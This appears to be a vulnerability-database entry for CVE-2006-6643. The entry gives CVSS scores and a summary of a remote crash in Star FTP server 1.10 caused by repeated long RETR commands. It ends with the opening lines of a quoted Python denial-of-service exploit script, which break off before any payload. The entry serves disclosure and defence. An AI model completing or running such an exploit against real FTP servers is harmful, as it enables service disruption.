5
CVSSv2

CVE-2006-6643

Published: 20/12/2006 Updated: 19/10/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Fightersoft Multimedia Star FTP server 1.10 allows remote malicious users to cause a denial of service (crash) via multiple RETR commands with long arguments.

Vulnerable Product Search on Vulmon Subscribe to Product

fightersoft multimedia star ftp server 1.10

Exploits

# Star FTP server 110 # Bug type: stack overflow # Found by Necro <neco * ihackpl> iHACKpl from socket import * from sys import exit print '\n[*] Star FTP server 110 Remote 0day DoS Exploit' print '[*] Bug found by Necro <necro*ihackpl> iHACKpl' host = '127001' port = 21 username = 'necro' password = 'dupa' e ...